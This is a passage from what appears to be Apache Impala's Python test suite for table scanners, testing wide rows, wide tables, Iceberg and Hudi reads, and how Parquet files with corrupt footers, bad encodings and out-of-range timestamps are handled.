# TODO: Enable this test on non-HDFS filesystems once IMPALA-9365 is resolved.
if not IS_HDFS: pytest.skip()
self.run_stmt_in_hive(
"create table {0}.jointbl_test like functional.jointbl "
"stored as orc".format(unique_database))
self.run_stmt_in_hive(
'insert into {0}.jointbl_test '
'select * from functional_orc_def.jointbl'.format(unique_database))
self.execute_query_using_client(self.client,
'invalidate metadata {0}.jointbl_test'.format(unique_database),
vector)
else:
self.execute_query_using_client(self.client,
"create external table {0}.jointbl_test like jointbl".format(
unique_database), vector)
# Update the location of the new table to point the same location as the old table
location = self._get_table_location('jointbl', vector)
self.execute_query_using_client(self.client,
"alter table {0}.jointbl_test set location '{1}'".format(
unique_database, location), vector)
def test_unmatched_schema(self, vector, unique_database):
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("IMPALA-2890: Missing Kudu DDL support")
table_format = vector.get_value('table_format')
# jointbl has no columns with unique values. When loaded in hbase, the table looks
# different, as hbase collapses duplicates.
if table_format.file_format == 'hbase':
pytest.skip()
self._create_test_table(vector, unique_database)
self.run_test_case('QueryTest/test-unmatched-schema', vector, use_db=unique_database)
# Tests that scanners can read a single-column, single-row, 10MB table
class TestWideRow(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestWideRow, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
# I can't figure out how to load a huge row into hbase
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format != 'hbase')
def test_wide_row(self, vector):
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("KUDU-666: Kudu support for large values")
new_vector = deepcopy(vector)
# Use a 5MB scan range, so we will have to perform 5MB of sync reads
new_vector.get_value('exec_option')['max_scan_range_length'] = 5 * 1024 * 1024
# We need > 10 MB of memory because we're creating extra buffers:
# - 10 MB table / 5 MB scan range = 2 scan ranges, each of which may allocate ~20MB
# - Sync reads will allocate ~5MB of space
# The 100MB value used here was determined empirically by raising the limit until the
# query succeeded for all file formats -- I don't know exactly why we need this much.
# TODO: figure out exact breakdown of memory usage (IMPALA-681)
new_vector.get_value('exec_option')['mem_limit'] = 100 * 1024 * 1024
# Specify that the query should able to handle 10 MB MAX_ROW_SIZE.
new_vector.get_value('exec_option')['max_row_size'] = 10 * 1024 * 1024
self.run_test_case('QueryTest/wide-row', new_vector)
class TestWideTable(ImpalaTestSuite):
# TODO: expand this to more rows when we have the capability
NUM_COLS = [250, 500, 1000]
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestWideTable, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_dimension(ImpalaTestDimension("num_cols", *cls.NUM_COLS))
# To cut down on test execution time, only run in exhaustive.
if cls.exploration_strategy() != 'exhaustive':
cls.ImpalaTestMatrix.add_constraint(lambda v: False)
def test_wide_table(self, vector):
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("IMPALA-3718: Extend Kudu functional test support")
NUM_COLS = vector.get_value('num_cols')
# Due to the way HBase handles duplicate row keys, we have different number of
# rows in HBase tables compared to HDFS tables.
NUM_ROWS = 10 if vector.get_value('table_format').file_format != 'hbase' else 2
DB_NAME = QueryTestSectionReader.get_db_name(vector.get_value('table_format'))
TABLE_NAME = "%s.widetable_%s_cols" % (DB_NAME, NUM_COLS)
result = self.client.execute("select count(*) from %s " % TABLE_NAME)
assert result.data == [str(NUM_ROWS)]
expected_result = widetable.get_data(NUM_COLS, NUM_ROWS, quote_strings=True)
result = self.client.execute("select * from %s" % TABLE_NAME)
if vector.get_value('table_format').file_format == 'hbase':
assert len(result.data) == NUM_ROWS
return
types = result.column_types
labels = result.column_labels
expected = QueryTestResult(expected_result, types, labels, order_matters=False)
actual = QueryTestResult(parse_result_rows(result), types, labels,
order_matters=False)
assert expected == actual
class TestHudiParquet(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestHudiParquet, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'parquet')
def test_hudiparquet(self, vector):
self.run_test_case('QueryTest/hudi-parquet', vector)
class TestIceberg(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestIceberg, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'parquet')
def test_iceberg_query(self, vector):
self.run_test_case('QueryTest/iceberg-query', vector)
def test_iceberg_profile(self, vector, unique_database):
self.run_test_case('QueryTest/iceberg-profile', vector, use_db=unique_database)
class TestParquet(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestParquet, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_exec_option_dimension(debug_action_options=DEBUG_ACTION_DIMS))
cls.ImpalaTestMatrix.add_constraint(
lambda v: v.get_value('table_format').file_format == 'parquet')
def test_parquet(self, vector):
self.run_test_case('QueryTest/parquet', vector)
def test_corrupt_files(self, vector):
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['num_nodes'] # .test file sets num_nodes
new_vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/parquet-continue-on-error', new_vector)
new_vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/parquet-abort-on-error', new_vector)
def test_timestamp_out_of_range(self, vector, unique_database):
"""IMPALA-4363: Test scanning parquet files with an out of range timestamp.
Also tests IMPALA-7595: Test Parquet timestamp columns where the time part
is out of the valid range [0..24H).
"""
# out of range date part
create_table_from_parquet(self.client, unique_database, "out_of_range_timestamp")
# out of range time part
create_table_from_parquet(self.client, unique_database, "out_of_range_time_of_day")
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/out-of-range-timestamp-continue-on-error',
vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/out-of-range-timestamp-abort-on-error',
vector, unique_database)
def test_dateless_timestamp_parquet(self, vector, unique_database):
"""Test scanning parquet files which still includes dateless timestamps."""
tbl_name = "timestamp_table"
create_sql = "create table %s.%s (t timestamp) stored as parquet" % (
unique_database, tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, tbl_name,
["/testdata/data/dateless_timestamps.parq"])
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/dateless_timestamp_parquet', new_vector,
use_db=unique_database)
def test_date_out_of_range_parquet(self, vector, unique_database):
"""Test scanning parquet files with an out of range date."""
create_table_from_parquet(self.client, unique_database, "out_of_range_date")
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/out-of-range-date', new_vector, unique_database)
def test_pre_gregorian_date_parquet(self, vector, unique_database):
"""Test date interoperability issues between Impala and Hive 2.1.1 when scanning
a parquet table that contains dates that precede the introduction of Gregorian
calendar in 1582-10-15.
"""
create_table_from_parquet(self.client, unique_database, "hive2_pre_gregorian")
self.run_test_case('QueryTest/hive2-pre-gregorian-date', vector, unique_database)
def test_zero_rows(self, vector, unique_database):
"""IMPALA-3943: Tests that scanning files with num_rows=0 in the file footer
succeeds without errors."""
# Create test table with a file that has 0 rows and 0 row groups.
create_table_from_parquet(self.client, unique_database, "zero_rows_zero_row_groups")
# Create test table with a file that has 0 rows and 1 row group.
create_table_from_parquet(self.client, unique_database, "zero_rows_one_row_group")
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/parquet-zero-rows', vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/parquet-zero-rows', vector, unique_database)
def test_repeated_root_schema(self, vector, unique_database):
"""IMPALA-4826: Tests that running a scan on a schema where the root schema's
repetition level is set to REPEATED succeeds without errors."""
create_table_from_parquet(self.client, unique_database, "repeated_root_schema")
result = self.client.execute("select * from %s.repeated_root_schema" % unique_database)
assert len(result.data) == 300
def test_huge_num_rows(self, vector, unique_database):
"""IMPALA-5021: Tests that a zero-slot scan on a file with a huge num_rows in the
footer succeeds without errors."""
create_table_from_parquet(self.client, unique_database, "huge_num_rows")
result = self.client.execute("select count(*) from %s.huge_num_rows"
% unique_database)
assert len(result.data) == 1
assert "4294967294" in result.data
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@SkipIfS3.hive
@SkipIfGCS.hive
def test_multi_compression_types(self, vector, unique_database):
"""IMPALA-5448: Tests that parquet splits with multi compression types are counted
correctly. Cases tested:
- parquet file with columns using the same compression type
- parquet files using snappy and gzip compression types
"""
self.client.execute("create table %s.alltypes_multi_compression like"
" functional_parquet.alltypes" % unique_database)
hql_format = "set parquet.compression={codec};" \
"insert into table %s.alltypes_multi_compression" \
" partition (year = {year}, month = {month})" \
" select id, bool_col, tinyint_col, smallint_col, int_col, bigint_col," \
" float_col, double_col,date_string_col,string_col,timestamp_col" \
" from functional_parquet.alltypes" \
" where year = {year} and month = {month}" % unique_database
self.run_stmt_in_hive(hql_format.format(codec="snappy", year=2010, month=1))
self.run_stmt_in_hive(hql_format.format(codec="gzip", year=2010, month=2))
test_files = ["testdata/multi_compression_parquet_data/tinytable_0_gzip_snappy.parq",
"testdata/multi_compression_parquet_data/tinytable_1_snappy_gzip.parq"]
create_table_and_copy_files(self.client, "create table {db}.{tbl} "
"(a string, b string) stored as parquet",
unique_database, "multi_compression",
test_files)
vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case('QueryTest/hdfs_parquet_scan_node_profile',
vector, unique_database)
def test_corrupt_rle_counts(self, vector, unique_database):
"""IMPALA-3646: Tests that a certain type of file corruption for plain
dictionary encoded values is gracefully handled. Cases tested:
- incorrect literal count of 0 for the RLE encoded dictionary indexes
- incorrect repeat count of 0 for the RLE encoded dictionary indexes
"""
# Create test table and copy the corrupt files into it.
test_files = ["testdata/data/bad_rle_literal_count.parquet",
"testdata/data/bad_rle_repeat_count.parquet"]
create_table_and_copy_files(self.client,
"create table {db}.{tbl} (c bigint) stored as parquet",
unique_database, "bad_rle_counts", test_files)
# Querying the corrupted files should not DCHECK or crash.
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/parquet-corrupt-rle-counts', vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/parquet-corrupt-rle-counts-abort',
vector, unique_database)
def corrupt_footer_len_common(self, vector, unique_database, testname_postfix):
"""Common code shared by some tests (such as the ones included in IMPALA-6442 patch).
It creates a simple table then loads manually corrupted Parquet file, and runs
simple query to trigger the printing of related messages. Individual test checks if
the printed messageses are expected.
"""
test_file = "testdata/data/corrupt_footer_len_" + testname_postfix + ".parquet"
test_table = "corrupt_footer_len_" + testname_postfix
test_spec = "QueryTest/parquet-corrupt-footer-len-" + testname_postfix
# Create test table and copy the corrupt files into it.
test_files = [test_file]
create_table_and_copy_files(self.client,
"create table {db}.{tbl} (c bigint) stored as parquet",
unique_database, test_table, test_files)
# Querying the corrupted files should not DCHECK or crash.
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case(test_spec, vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case(test_spec, vector, unique_database)
def test_corrupt_footer_len_decr(self, vector, unique_database):
"""IMPALA-6442: Misleading file offset reporting in error messages.
Case tested: decrease the original Parquet footer size by 1, thus metadata
deserialization fails and prints expected error message with correct file offset of
the Parquet file metadata (footer).
"""
self.corrupt_footer_len_common(vector, unique_database, "decr")
def test_corrupt_footer_len_incr(self, vector, unique_database):
"""IMPALA-6442: Misleading file offset reporting in error messages.
Case tested: make the Parquet footer size bigger than the file, thus the footer
can not be loaded and corresponding error message is printed.
"""
self.corrupt_footer_len_common(vector, unique_database, "incr")
def test_bad_compressed_page_size(self, vector, unique_database):
"""IMPALA-6353: Tests that a parquet dict page with 0 compressed_page_size is
gracefully handled. """
create_table_from_parquet(self.client, unique_database,
"bad_compressed_dict_page_size")
self.run_test_case('QueryTest/parquet-bad-compressed-dict-page-size', vector,
unique_database)
def test_def_levels(self, vector, unique_database):
"""Test that Impala behaves as expected when decoding def levels with different
encodings - RLE, BIT_PACKED, etc."""
create_table_from_parquet(self.client, unique_database,
"alltypes_agg_bitpacked_def_levels")
self.run_test_case('QueryTest/parquet-def-levels', vector, unique_database)
def test_bad_compression_codec(self, vector, unique_database):
"""IMPALA-6593: test the bad compression codec is handled gracefully. """
test_files = ["testdata/data/bad_codec.parquet"]
create_table_and_copy_files(self.client, """CREATE TABLE {db}.{tbl} (
id INT, bool_col BOOLEAN, tinyint_col TINYINT, smallint_col SMALLINT,
int_col INT, bigint_col BIGINT, float_col FLOAT, double_col DOUBLE,
date_string_col STRING, string_col STRING, timestamp_col TIMESTAMP,
year INT, month INT) STORED AS PARQUET""",
unique_database, "bad_codec",
test_files)
self.run_test_case('QueryTest/parquet-bad-codec', vector, unique_database)
def test_num_values_def_levels_mismatch(self, vector, unique_database):
"""IMPALA-6589: test the bad num_values handled correctly. """
create_table_from_parquet(self.client, unique_database,
"num_values_def_levels_mismatch")
self.run_test_case('QueryTest/parquet-num-values-def-levels-mismatch',
vector, unique_database)
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_misaligned_parquet_row_groups(self, vector):
"""IMPALA-3989: Test that no warnings are issued when misaligned row groups are
encountered. Make sure that 'NumScannersWithNoReads' counters are set to the number of
scanners that end up doing no reads because of misaligned row groups.
"""
# functional.parquet.alltypes is well-formatted. 'NumScannersWithNoReads' counters are
# set to 0.
table_name = 'functional_parquet.alltypes'
self._misaligned_parquet_row_groups_helper(table_name, 7300)
# lineitem_multiblock_parquet/000000_0 is ill-formatted but every scanner reads some
# row groups. 'NumScannersWithNoReads' counters are set to 0.
table_name = 'functional_parquet.lineitem_multiblock'
self._misaligned_parquet_row_groups_helper(table_name, 20000)
# lineitem_sixblocks.parquet is ill-formatted but every scanner reads some row groups.
# 'NumScannersWithNoReads' counters are set to 0.
table_name = 'functional_parquet.lineitem_sixblocks'
self._misaligned_parquet_row_groups_helper(table_name, 40000)
# Scanning lineitem_one_row_group.parquet finds two scan ranges that end up doing no
# reads because the file is poorly formatted.
table_name = 'functional_parquet.lineitem_multiblock_one_row_group'
self._misaligned_parquet_row_groups_helper(
table_name, 40000, num_scanners_with_no_reads=2)
def _misaligned_parquet_row_groups_helper(
self, table_name, rows_in_table, num_scanners_with_no_reads=0, log_prefix=None):
"""Checks if executing a query logs any warnings and if there are any scanners that
end up doing no reads. 'log_prefix' specifies the prefix of the expected warning.
'num_scanners_with_no_reads' indicates the expected number of scanners that don't read
anything because the underlying file is poorly formatted
"""
query = 'select * from %s' % table_name
result = self.client.execute(query)
assert len(result.data) == rows_in_table
assert (not result.log and not log_prefix) or \
(log_prefix and result.log.startswith(log_prefix))
num_scanners_with_no_reads_list = re.findall(
'NumScannersWithNoReads: ([0-9]*)', result.runtime_profile)
# This will fail if the number of impalads != 3
# The fourth fragment is the "Averaged Fragment"
assert len(num_scanners_with_no_reads_list) == 4
# Calculate the total number of scan ranges that ended up not reading anything because
# an underlying file was poorly formatted.
# Skip the Averaged Fragment; it comes first in the runtime profile.
total = 0
for n in num_scanners_with_no_reads_list[1:]:
total += int(n)
assert total == num_scanners_with_no_reads
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_multiple_blocks_mt_dop(self, vector):
"""Sanity check for MT scan nodes to make sure all blocks from the same file are read.
2 scan ranges per node should be created to read 'lineitem_sixblocks' because
there are 6 blocks and 3 scan nodes. We set mt_dop to 2, so ideally every instance
should read a single range, but since they share a queue its not deterministic and
instead we verify sum of ranges read on a backend is 2."""
query = 'select count(l_orderkey) from functional_parquet.lineitem_sixblocks'
try:
self.client.set_configuration_option('mt_dop', '2')
result = self.client.execute(query)
TOTAL_ROWS = 40000
ranges_complete_list = re.findall(r'ScanRangesComplete: ([0-9]*)',
result.runtime_profile)
num_rows_read_list = re.findall(r'RowsRead: [0-9.K]* \(([0-9]*)\)',
result.runtime_profile)
# The extra fragment is the "Averaged Fragment"
assert len(num_rows_read_list) == 7
assert len(ranges_complete_list) == 7
total_rows_read = 0
# Skip the Averaged Fragment; it comes first in the runtime profile.
for num_row_read in num_rows_read_list[1:]:
total_rows_read += int(num_row_read)
assert total_rows_read == TOTAL_ROWS
# Again skip the Averaged Fragment; it comes first in the runtime profile.
# With mt_dop 2, every backend will have 2 instances which are printed consecutively
# in the profile.
for i in range(1, len(ranges_complete_list), 2):
assert int(ranges_complete_list[i]) + int(ranges_complete_list[i + 1]) == 2
finally:
self.client.clear_configuration()
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_multiple_blocks(self, vector):
# For IMPALA-1881. The table functional_parquet.lineitem_multiblock has 3 blocks, so
# each impalad should read 1 scan range.
table_name = 'functional_parquet.lineitem_multiblock'
self._multiple_blocks_helper(table_name, 20000, ranges_per_node=1)
table_name = 'functional_parquet.lineitem_sixblocks'
# 2 scan ranges per node should be created to read 'lineitem_sixblocks' because
# there are 6 blocks and 3 scan nodes.
self._multiple_blocks_helper(table_name, 40000, ranges_per_node=2)
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_multiple_blocks_one_row_group(self, vector):
# For IMPALA-1881. The table functional_parquet.lineitem_multiblock_one_row_group has
# 3 blocks but only one row group across these blocks. We test to see that only one
# scan range reads everything from this row group.
table_name = 'functional_parquet.lineitem_multiblock_one_row_group'
self._multiple_blocks_helper(
table_name, 40000, one_row_group=True, ranges_per_node=1)
def _multiple_blocks_helper(
self, table_name, rows_in_table, one_row_group=False, ranges_per_node=1):
""" This function executes a simple SELECT query on a multiblock parquet table and
verifies the number of ranges issued per node and verifies that at least one row group
was read. If 'one_row_group' is True, then one scan range is expected to read the data
from the entire table regardless of the number of blocks. 'ranges_per_node' indicates
how many scan ranges we expect to be issued per node. """
query = 'select count(l_orderkey) from %s' % table_name
result = self.client.execute(query)
assert len(result.data) == 1
assert result.data[0] == str(rows_in_table)
num_row_groups_list = re.findall('NumRowGroups: ([0-9]*)', result.runtime_profile)
scan_ranges_complete_list = re.findall(
'ScanRangesComplete: ([0-9]*)', result.runtime_profile)
num_rows_read_list = re.findall(r'RowsRead: [0-9.K]* \(([0-9]*)\)',
result.runtime_profile)
REGEX_UNIT_SECOND = "[0-9]*[s]*[0-9]*[.]*[0-9]*[nm]*[s]*"
REGEX_MIN_MAX_FOOTER_PROCESSING_TIME = \
("FooterProcessingTime: \(Avg: %s ; \(Min: (%s) ; Max: (%s) ; "
"Number of samples: %s\)" % (REGEX_UNIT_SECOND, REGEX_UNIT_SECOND,
REGEX_UNIT_SECOND, "[0-9]*"))
footer_processing_time_list = re.findall(
REGEX_MIN_MAX_FOOTER_PROCESSING_TIME, result.runtime_profile)
# This will fail if the number of impalads != 3
# The fourth fragment is the "Averaged Fragment"
assert len(num_row_groups_list) == 4, result.runtime_profile
assert len(scan_ranges_complete_list) == 4, result.runtime_profile
assert len(num_rows_read_list) == 4, result.runtime_profile
total_num_row_groups = 0
# Skip the Averaged Fragment; it comes first in the runtime profile.
for num_row_groups in num_row_groups_list[1:]:
total_num_row_groups += int(num_row_groups)
if not one_row_group: assert int(num_row_groups) > 0
if one_row_group:
# If it's the one row group test, only one scan range should read all the data from
# that row group.
assert total_num_row_groups == 1
for rows_read in num_rows_read_list[1:]:
if rows_read != '0': assert rows_read == str(rows_in_table)
for scan_ranges_complete in scan_ranges_complete_list:
assert int(scan_ranges_complete) == ranges_per_node
# This checks if the SummaryStatsCounter works correctly. When there is one scan
# range per node, we verify that the FooterProcessingTime counter has the min, max
# and average values as the same since we have only one sample (i.e. only one range)
# TODO: Test this for multiple ranges per node as well. This requires parsing the
# stat times as strings and comparing if min <= avg <= max.
if ranges_per_node == 1:
for min_max_time in footer_processing_time_list:
# Assert that (min == avg == max)
assert min_max_time[0] == min_max_time[1] == min_max_time[2] != 0
def test_annotate_utf8_option(self, vector, unique_database):
if self.exploration_strategy() != 'exhaustive': pytest.skip("Only run in exhaustive")
# Create table
TABLE_NAME = "parquet_annotate_utf8_test"
qualified_table_name = "%s.%s" % (unique_database, TABLE_NAME)
query = 'create table %s (a string, b char(10), c varchar(10), d string) ' \
'stored as parquet' % qualified_table_name
self.client.execute(query)
# Insert data that should have UTF8 annotation
query = 'insert overwrite table %s '\
'values("a", cast("b" as char(10)), cast("c" as varchar(10)), "d")' \
% qualified_table_name
self.execute_query(query, {'parquet_annotate_strings_utf8': True})
def get_schema_elements():
# Copy the created file to the local filesystem and parse metadata
local_file = '/tmp/utf8_test_%s.parq' % random.randint(0, 10000)
LOG.info("test_annotate_utf8_option local file name: " + local_file)
hdfs_file = get_fs_path('/test-warehouse/%s.db/%s/*.parq'
% (unique_database, TABLE_NAME))
check_call(['hadoop', 'fs', '-copyToLocal', hdfs_file, local_file])
metadata = get_parquet_metadata(local_file)
# Extract SchemaElements corresponding to the table columns
a_schema_element = metadata.schema[1]
assert a_schema_element.name == 'a'
b_schema_element = metadata.schema[2]
assert b_schema_element.name == 'b'
c_schema_element = metadata.schema[3]
assert c_schema_element.name == 'c'
d_schema_element = metadata.schema[4]
assert d_schema_element.name == 'd'
os.remove(local_file)
return a_schema_element, b_schema_element, c_schema_element, d_schema_element
# Check that the schema uses the UTF8 annotation
a_schema_elt, b_schema_elt, c_schema_elt, d_schema_elt = get_schema_elements()
assert a_schema_elt.converted_type == ConvertedType.UTF8
assert b_schema_elt.converted_type == ConvertedType.UTF8
assert c_schema_elt.converted_type == ConvertedType.UTF8
assert d_schema_elt.converted_type == ConvertedType.UTF8
# Create table and insert data that should not have UTF8 annotation for strings
self.execute_query(query, {'parquet_annotate_strings_utf8': False})
# Check that the schema does not use the UTF8 annotation except for CHAR and VARCHAR
# columns
a_schema_elt, b_schema_elt, c_schema_elt, d_schema_elt = get_schema_elements()
assert a_schema_elt.converted_type is None
assert b_schema_elt.converted_type == ConvertedType.UTF8
assert c_schema_elt.converted_type == ConvertedType.UTF8
assert d_schema_elt.converted_type is None
def test_resolution_by_name(self, vector, unique_database):
self.run_test_case('QueryTest/parquet-resolution-by-name', vector,
use_db=unique_database)
def test_decimal_encodings(self, vector, unique_database):
# Create a table using an existing data file with dictionary-encoded, variable-length
# physical encodings for decimals.
test_files = ["testdata/data/binary_decimal_dictionary.parquet",
"testdata/data/binary_decimal_no_dictionary.parquet"]
create_table_and_copy_files(self.client, """create table if not exists {db}.{tbl}
(small_dec decimal(9,2), med_dec decimal(18,2), large_dec decimal(38,2))
STORED AS PARQUET""", unique_database, "decimal_encodings", test_files)
create_table_from_parquet(self.client, unique_database, 'decimal_stored_as_int32')
create_table_from_parquet(self.client, unique_database, 'decimal_stored_as_int64')
create_table_from_parquet(self.client, unique_database, 'decimal_padded_fixed_len_byte_array')
create_table_from_parquet(self.client, unique_database, 'decimal_padded_fixed_len_byte_array2')
self.run_test_case('QueryTest/parquet-decimal-formats', vector, unique_database)
def test_rle_encoded_bools(self, vector, unique_database):
"""IMPALA-6324: Test that Impala decodes RLE encoded booleans correctly."""
create_table_from_parquet(self.client, unique_database, "rle_encoded_bool")
self.run_test_case(
'QueryTest/parquet-rle-encoded-bool', vector, unique_database)
def test_dict_encoding_with_large_bit_width(self, vector, unique_database):
"""IMPALA-7147: Test that Impala can decode dictionary encoded pages where the
dictionary index bit width is larger than the encoded byte's bit width.
"""
TABLE_NAME = "dict_encoding_with_large_bit_width"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
result = self.execute_query(
"select * from {0}.{1}".format(unique_database, TABLE_NAME))
assert(len(result.data) == 33)
def test_rle_dictionary_encoding(self, vector, unique_database):
"""IMPALA-6434: Add support to decode RLE_DICTIONARY encoded pages."""
TABLE_NAME = "alltypes_tiny_rle_dictionary"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
self.run_test_case("QueryTest/parquet-rle-dictionary", vector, unique_database)
def test_type_widening(self, vector, unique_database):
"""IMPALA-6373: Test that Impala can read parquet file with column types smaller than
the schema with larger types"""
TABLE_NAME = "primitive_type_widening"
create_table_and_copy_files(self.client, """CREATE TABLE {db}.{tbl} (
a smallint, b int, c bigint, d double, e int, f bigint, g double, h int,
i double, j double) STORED AS PARQUET""", unique_database, TABLE_NAME,
["/testdata/data/{0}.parquet".format(TABLE_NAME)])
self.run_test_case("QueryTest/parquet-type-widening", vector, unique_database)
def test_error_propagation_race(self, vector, unique_database):
"""IMPALA-7662: failed scan signals completion before error is propagated. To
reproduce, we construct a table with two Parquet files, one valid and another
invalid. The scanner thread for the invalid file must propagate the error
before we mark the whole scan complete."""
if vector.get_value('exec_option')['debug_action'] is not None:
pytest.skip(".test file needs to override debug action")
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['debug_action']
create_table_and_copy_files(self.client,
"CREATE TABLE {db}.{tbl} (s STRING) STORED AS PARQUET",
unique_database, "bad_magic_number", ["testdata/data/bad_magic_number.parquet"])
# We need the ranges to all be scheduled on the same impalad.
new_vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case("QueryTest/parquet-error-propagation-race", new_vector,
unique_database)
def test_int64_timestamps(self, vector, unique_database):
"""IMPALA-5050: Test that Parquet columns with int64 physical type and
timestamp_millis/timestamp_micros logical type can be read both as
int64 and as timestamp.
"""
# Tiny plain encoded parquet file.
TABLE_NAME = "int64_timestamps_plain"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
TABLE_NAME = "int64_bigints_plain"
CREATE_SQL = """CREATE TABLE {0}.{1} (
new_logical_milli_utc BIGINT,
new_logical_milli_local BIGINT,
new_logical_micro_utc BIGINT,
new_logical_micro_local BIGINT
) STORED AS PARQUET""".format(unique_database, TABLE_NAME)
create_table_and_copy_files(self.client, CREATE_SQL, unique_database, TABLE_NAME,
["/testdata/data/int64_timestamps_plain.parquet"])
# Larger dictionary encoded parquet file.
TABLE_NAME = "int64_timestamps_dict"
CREATE_SQL = """CREATE TABLE {0}.{1} (
id INT,
new_logical_milli_utc TIMESTAMP,
new_logical_milli_local TIMESTAMP,
new_logical_micro_utc TIMESTAMP,
new_logical_micro_local TIMESTAMP
) STORED AS PARQUET""".format(unique_database, TABLE_NAME)
create_table_and_copy_files(self.client, CREATE_SQL, unique_database, TABLE_NAME,
["/testdata/data/{0}.parquet".format(TABLE_NAME)])
TABLE_NAME = "int64_bigints_dict"
CREATE_SQL = """CREATE TABLE {0}.{1} (
id INT,
new_logical_milli_utc BIGINT,
new_logical_milli_local BIGINT,
new_logical_micro_utc BIGINT,
new_logical_micro_local BIGINT
) STORED AS PARQUET""".format(unique_database, TABLE_NAME)
create_table_and_copy_files(self.client, CREATE_SQL, unique_database, TABLE_NAME,
["/testdata/data/int64_timestamps_dict.parquet"])
TABLE_NAME = "int64_timestamps_at_dst_changes"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
TABLE_NAME = "int64_timestamps_nano"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
self.run_test_case(
'QueryTest/parquet-int64-timestamps', vector, unique_database)
def _is_summary_stats_counter_empty(self, counter):
"""Returns true if the given TSummaryStatCounter is empty, false otherwise"""
return counter.max_value == counter.min_value == counter.sum ==\
counter.total_num_values == 0
def test_page_size_counters(self, vector):
"""IMPALA-6964: Test that the counter Parquet[Un]compressedPageSize is updated
when reading [un]compressed Parquet files, and that the counter
Parquet[Un]compressedPageSize is not updated."""
# lineitem_sixblocks is not compressed so ParquetCompressedPageSize should be empty,
# but ParquetUncompressedPageSize should have been updated. Query needs an order by
# so that all rows are read. Only access a couple of columns to reduce query runtime.
result = self.client.execute("select l_orderkey"
" from functional_parquet.lineitem_sixblocks"
" order by l_orderkey limit 10")
compressed_page_size_summaries = get_bytes_summary_stats_counter(
"ParquetCompressedPageSize", result.runtime_profile)
assert len(compressed_page_size_summaries) > 0
for summary in compressed_page_size_summaries:
assert self._is_summary_stats_counter_empty(summary)
uncompressed_page_size_summaries = get_bytes_summary_stats_counter(
"ParquetUncompressedPageSize", result.runtime_profile)
# validate that some uncompressed data has been read; we don't validate the exact
# amount as the value can change depending on Parquet format optimizations, Impala
# scanner optimizations, etc.
assert len(uncompressed_page_size_summaries) > 0
for summary in uncompressed_page_size_summaries:
assert not self._is_summary_stats_counter_empty(summary)
# alltypestiny is compressed so both ParquetCompressedPageSize and
# ParquetUncompressedPageSize should have been updated
# Query needs an order by so that all rows are read.
